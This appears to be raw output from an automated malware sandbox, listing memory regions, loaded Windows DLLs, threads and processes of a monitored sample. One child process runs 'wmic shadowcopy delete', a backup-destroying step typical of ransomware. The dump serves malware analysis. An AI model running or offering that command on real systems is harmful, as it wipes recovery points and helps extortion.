filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1341 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1342 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1343 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1344 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1345 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1346 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1347 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1348 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1349 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1350 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1351 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1352 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1353 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1354 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1355 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1356 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1357 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1358 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1359 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1360 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1361 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1362 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1363 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1364 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1365 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1366 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1367 start_va = 0x100000 end_va = 0x107fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1368 start_va = 0x7fefa3a0000 end_va = 0x7fefa54ffff monitored = 0 entry_point = 0x7fefa3a1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2178 start_va = 0xe70000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 2179 start_va = 0xfc0000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 2180 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2181 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Thread: id = 35 os_tid = 0xff8 Thread: id = 36 os_tid = 0xff4 Thread: id = 37 os_tid = 0xfec Thread: id = 38 os_tid = 0xfe8 Thread: id = 39 os_tid = 0xfe4 Thread: id = 40 os_tid = 0xfe0 Thread: id = 41 os_tid = 0xc78 Thread: id = 114 os_tid = 0xd74 Thread: id = 158 os_tid = 0xaac Process: id = "7" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x33c37000" os_pid = "0xcac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xf84" cmd_line = "wmic shadowcopy delete" cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1369 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1370 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1371 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1372 start_va = 0x100000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1373 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1374 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1375 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1376 start_va = 0xff700000 end_va = 0xff78cfff monitored = 1 entry_point = 0xff74cc30 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe") Region: id = 1377 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1378 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1379 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1380 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1381 start_va = 0x180000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1382 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1383 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1384 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1385 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1386 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1387 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1388 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1389 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1390 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1391 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1392 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1393 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1394 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1395 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1396 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1397 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1398 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1399 start_va = 0x7fef7780000 end_va = 0x7fef77c2fff monitored = 0 entry_point = 0x7fef77a1b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1400 start_va = 0x7fefd640000 end_va = 0x7fefd664fff monitored = 0 entry_point = 0x7fefd649658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1401 start_va = 0x7feff2d0000 end_va = 0x7feff340fff monitored = 0 entry_point = 0x7feff2e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1402 start_va = 0x7feff970000 end_va = 0x7feff9bcfff monitored = 0 entry_point = 0x7feff971070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1403 start_va = 0x7feff9c0000 end_va = 0x7feff9c7fff monitored = 0 entry_point = 0x7feff9c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1404 start_va = 0x7fefd610000 end_va = 0x7fefd61afff monitored = 0 entry_point = 0x7fefd611030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1405 start_va = 0x7fefb270000 end_va = 0x7fefb296fff monitored = 0 entry_point = 0x7fefb2798bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1406 start_va = 0x7fefb260000 end_va = 0x7fefb26afff monitored = 0 entry_point = 0x7fefb261198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1407 start_va = 0x180000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1408 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1409 start_va = 0x360000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1410 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1411 start_va = 0x460000 end_va = 0x5e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1412 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1413 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1414 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1415 start_va = 0x5f0000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1416 start_va = 0x780000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 1417 start_va = 0xc0000 end_va = 0xcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui") Region: id = 1418 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1419 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1420 start_va = 0x180000 end_va = 0x1fcfff monitored = 0 entry_point = 0x18cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1421 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1422 start_va = 0x180000 end_va = 0x1fcfff monitored = 0 entry_point = 0x18cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1423 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1424 start_va = 0x1b0000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1425 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1426 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1427 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1428 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1429 start_va = 0x7fef9b80000 end_va = 0x7fef9b8dfff monitored = 0 entry_point = 0x7fef9b85500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1430 start_va = 0x7fef9e20000 end_va = 0x7fef9e96fff monitored = 0 entry_point = 0x7fef9e5e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1431 start_va = 0x7fefd1e0000 end_va = 0x7fefd201fff monitored = 0 entry_point = 0x7fefd1e5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1432 start_va = 0x1b80000 end_va = 0x1e4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1433 start_va = 0x7fef44d0000 end_va = 0x7fef46a3fff monitored = 0 entry_point = 0x7fef4506b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1434 start_va = 0x1e50000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1435 start_va = 0x1fc0000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 1436 start_va = 0x1e50000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1437 start_va = 0x1f40000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 1438 start_va = 0x2230000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1439 start_va = 0x1fc0000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 1440 start_va = 0x21b0000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 1441 start_va = 0x24a0000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1442 start_va = 0x2230000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1443 start_va = 0x2420000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1444 start_va = 0x2090000 end_va = 0x214ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1445 start_va = 0x2700000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1446 start_va = 0x190000 end_va = 0x190fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1447 start_va = 0x240000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1448 start_va = 0x7feff510000 end_va = 0x7feff687fff monitored = 0 entry_point = 0x7feff5110e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1449 start_va = 0x7fefde60000 end_va = 0x7fefdf89fff monitored = 0 entry_point = 0x7fefde610d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1450 start_va = 0x7fefeea0000 end_va = 0x7feff0f8fff monitored = 0 entry_point = 0x7fefeea1340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1451 start_va = 0x7fefd9e0000 end_va = 0x7fefdb4cfff monitored = 0 entry_point = 0x7fefd9e10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1452 start_va = 0x7fefd820000 end_va = 0x7fefd82efff monitored = 0 entry_point = 0x7fefd821020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1453 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1454 start_va = 0x7fefc2b0000 end_va = 0x7fefc4a3fff monitored = 0 entry_point = 0x7fefc43c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1455 start_va = 0x1e50000 end_va = 0x1e50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1456 start_va = 0x1ec0000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 1457 start_va = 0x1e60000 end_va = 0x1e61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 1458 start_va = 0x7fefe070000 end_va = 0x7fefedf7fff monitored = 0 entry_point = 0x7fefe0ecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1459 start_va = 0x1e50000 end_va = 0x1e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 1460 start_va = 0x7fefd780000 end_va = 0x7fefd78efff monitored = 0 entry_point = 0x7fefd7819b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1461 start_va = 0x1e70000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1462 start_va = 0x1e80000 end_va = 0x1e87fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1463 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1464 start_va = 0x7fefce90000 end_va = 0x7fefceeafff monitored = 0 entry_point = 0x7fefce96940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1465 start_va = 0x24a0000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1466 start_va = 0x2680000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1467 start_va = 0x7fefc0d0000 end_va = 0x7fefc125fff monitored = 0 entry_point = 0x7fefc0dbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1468 start_va = 0x2b00000 end_va = 0x2d6ffff monitored = 1 entry_point = 0x0 